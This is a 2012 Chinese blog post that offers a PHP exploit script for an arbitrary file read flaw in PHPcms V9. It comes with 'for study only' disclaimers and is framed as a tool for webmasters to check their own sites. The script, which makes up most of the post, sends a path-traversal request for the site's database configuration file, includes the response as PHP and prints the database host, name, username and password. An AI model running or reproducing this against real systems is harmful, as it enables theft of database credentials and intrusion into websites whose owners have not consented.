phpcmsV9任意读文件漏洞利用工具

发表于 2012年08月22日
Vulndb

注意：本程序带有攻击性，仅供学习研究请勿当作非法工具使用，否则后果自负，于本人无关！

睡觉前去论坛上面看了下，爆出 phpcmsV9最新任意读文件漏洞，第一反映就是

完了，估计互联网上又不知道多少万用户数据被脱了~~

自己就写了一个此漏洞的检测工具方便站长们检测自己的站点是否存在漏洞。

代码：

<?php
/**
 * PHPcms V9 任意文件读取漏洞检测工具
 * @author Return Blog: www.uedbox.com
 *
 * 注意本程序仅供学习参考，不得用于非法互动
 * 否则后果自负，与本人无关！
 */

function showInfo() {

print '
***********************************************
* PHPcmsV9 Read All File ExpTool By: Return
*
* Blog: www.creturn.com
*
* Email:master@creturn.com
*
* Example: php exp.php wwww.phpcms.cn
***********************************************
';
}

$exp = '/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../caches/configs/database.php';

//file_get_contents(''.$exp);
if(count($argv) < 2){
 showInfo();
}else{

 $exp = 'http://'.$argv[1].$exp;
 $data = @file_get_contents($exp);
 @file_put_contents('expDatabase.php', $data);
 if(strstr($data,'<html>')){
 showInfo();
 echo 'Not found !';
 exit();
 };
 $database = include 'expDatabase.php';
 showInfo();
 $out = 'HostName: '.$database['default']['hostname']."n";
 $out .='DataBase:'. $database['default']['database']."n";
 $out .='UserName:'. $database['default']['username']."n";
 $out .='Password:'. $database['default']['password']."n";
 if(!empty($database)){
 echo "Found it! :nn";
 echo $out;
 }
 @unlink('expDatabase.php');
}